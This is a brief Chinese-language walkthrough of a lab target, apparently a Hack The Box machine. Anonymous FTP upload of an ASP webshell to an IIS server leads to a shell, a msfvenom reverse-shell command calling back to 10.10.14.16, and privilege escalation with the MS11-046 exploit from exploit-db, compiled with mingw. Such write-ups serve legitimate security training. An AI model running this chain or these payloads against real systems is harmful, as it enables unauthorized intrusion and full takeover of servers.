端口信息
sudo nmap -sC -sV -A -p 21,80 10.10.10.5
匿名访问21端口,把里面的文件下载下来
访问80端口,是IIS7.0的
查看源码也没有什么收获
目录扫描发现了/aspnet_client 目录
gobuster dir -u http://10.10.10.5:80 -w /usr/share/wordlists/dirb/common.txt
重点来了,/aspnet_client就是ftp里发现的文件夹!(其实看到有iisstart.htm也可以猜到是iis的启动目录),访问10.10.10.5/iisstart.htm也可以验证这一点
试着上传一个asp
访问一下,成功上传
蚁剑连接(提前设置一下代理)
现在需要一个交互shell,msfvenom生成一个回连的tcp马
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=9003 -f exe -o shell.exe
kali开启监听,拿到交互shell
systeminfo查看可以发现这里是没有装补丁的
查找一下对应的win7版本6.1.7600的exp,是一个RCE
https://www.exploit-db.com/exploits/40564
有对应的使用方法,编译成exe
i686-w64-mingw32-gcc tiquan.c -o MS11-046.exe -lws2_32
kali开启smb服务,上传到靶机的temp目录下(亲测蚁剑无法上传)
运行,提权成功
总结
很基础,没有CTF那么大的脑洞。